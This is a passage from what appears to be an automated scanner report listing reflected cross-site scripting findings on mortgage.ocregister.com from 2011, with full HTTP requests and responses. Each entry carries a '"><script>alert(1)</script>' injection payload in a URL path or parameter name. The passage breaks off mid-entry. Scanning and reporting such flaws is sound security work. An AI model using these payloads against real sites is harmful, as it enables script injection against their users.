GET /2010/05bedbd"><script>alert(1)</script>11ff887daaf/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:43 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:44 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05bedbd\"><script>alert(1)</script>11ff887daaf/feed/" /> ...[SNIP]...
1.332. http://mortgage.ocregister.com/2010/05/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/05/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f28"><script>alert(1)</script>8593dcd5118 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0f28\"><script>alert(1)</script>8593dcd5118 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/05/?b0f28"><script>alert(1)</script>8593dcd5118=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98765
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 May - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/05/?b0f28\"><script>alert(1)</script>8593dcd5118=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a080d"><script>alert(1)</script>c86de3d6ec3 was submitted in the REST URL parameter 1. This input was echoed as a080d\"><script>alert(1)</script>c86de3d6ec3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010a080d"><script>alert(1)</script>c86de3d6ec3/06/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010a080d\"><script>alert(1)</script>c86de3d6ec3/06/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23a00"><script>alert(1)</script>ebbc17fb5f6 was submitted in the REST URL parameter 2. This input was echoed as 23a00\"><script>alert(1)</script>ebbc17fb5f6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/0623a00"><script>alert(1)</script>ebbc17fb5f6/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:43 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0623a00\"><script>alert(1)</script>ebbc17fb5f6/feed/" /> ...[SNIP]...
1.335. http://mortgage.ocregister.com/2010/06/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/06/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528df"><script>alert(1)</script>67a958dbc2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 528df\"><script>alert(1)</script>67a958dbc2c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/06/?528df"><script>alert(1)</script>67a958dbc2c=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:33 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 103917
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 June - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/06/?528df\"><script>alert(1)</script>67a958dbc2c=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3740"><script>alert(1)</script>9aa5f5044ac was submitted in the REST URL parameter 1. This input was echoed as e3740\"><script>alert(1)</script>9aa5f5044ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010e3740"><script>alert(1)</script>9aa5f5044ac/07/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:32 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010e3740\"><script>alert(1)</script>9aa5f5044ac/07/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 737f7"><script>alert(1)</script>3e0b1b344d0 was submitted in the REST URL parameter 2. This input was echoed as 737f7\"><script>alert(1)</script>3e0b1b344d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/07737f7"><script>alert(1)</script>3e0b1b344d0/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:34 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62653
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07737f7\"><script>alert(1)</script>3e0b1b344d0/feed/" /> ...[SNIP]...
1.338. http://mortgage.ocregister.com/2010/07/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/07/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0b75"><script>alert(1)</script>5819d4315a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c0b75\"><script>alert(1)</script>5819d4315a4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/07/?c0b75"><script>alert(1)</script>5819d4315a4=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:24 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 98756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 July - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/07/?c0b75\"><script>alert(1)</script>5819d4315a4=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4246e"><script>alert(1)</script>71ad8bebe0b was submitted in the REST URL parameter 1. This input was echoed as 4246e\"><script>alert(1)</script>71ad8bebe0b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20104246e"><script>alert(1)</script>71ad8bebe0b/08/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:35 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:35 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20104246e\"><script>alert(1)</script>71ad8bebe0b/08/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3e9c"><script>alert(1)</script>121b788efa9 was submitted in the REST URL parameter 2. This input was echoed as e3e9c\"><script>alert(1)</script>121b788efa9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08e3e9c"><script>alert(1)</script>121b788efa9/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:40 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08e3e9c\"><script>alert(1)</script>121b788efa9/feed/" /> ...[SNIP]...
1.341. http://mortgage.ocregister.com/2010/08/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/08/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed771"><script>alert(1)</script>1f1c98d951d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed771\"><script>alert(1)</script>1f1c98d951d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/08/?ed771"><script>alert(1)</script>1f1c98d951d=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:25 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 104455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 August - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/08/?ed771\"><script>alert(1)</script>1f1c98d951d=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3029"><script>alert(1)</script>458883cf61d was submitted in the REST URL parameter 1. This input was echoed as b3029\"><script>alert(1)</script>458883cf61d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010b3029"><script>alert(1)</script>458883cf61d/09/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:32 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62652
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010b3029\"><script>alert(1)</script>458883cf61d/09/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84704"><script>alert(1)</script>12779ca8568 was submitted in the REST URL parameter 2. This input was echoed as 84704\"><script>alert(1)</script>12779ca8568 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/0984704"><script>alert(1)</script>12779ca8568/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:39 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:39 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62655
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/0984704\"><script>alert(1)</script>12779ca8568/feed/" /> ...[SNIP]...
1.344. http://mortgage.ocregister.com/2010/09/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mortgage.ocregister.com
Path:
/2010/09/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3512f"><script>alert(1)</script>0f889d943e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3512f\"><script>alert(1)</script>0f889d943e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2010/09/?3512f"><script>alert(1)</script>0f889d943e3=1 HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:12:13 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 102979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" 2010 September - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/09/?3512f\"><script>alert(1)</script>0f889d943e3=1feed/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7345b"><script>alert(1)</script>a5ceac7571b was submitted in the REST URL parameter 1. This input was echoed as 7345b\"><script>alert(1)</script>a5ceac7571b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /20107345b"><script>alert(1)</script>a5ceac7571b/10/ HTTP/1.1 Host: mortgage.ocregister.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 19:12:15 GMT Server: Apache X-Powered-By: PHP/5.2.5 Vary: Cookie X-Pingback: http://mortgage.ocregister.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 19:12:15 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 62654
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... <link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/20107345b\"><script>alert(1)</script>a5ceac7571b/10/feed/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbcf4"><script>alert(1)</script>defd5ce1a69 was submitted in the REST URL parameter 2. This input was echoed as fbcf4\"><script>alert(1)</script>defd5ce1a69 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
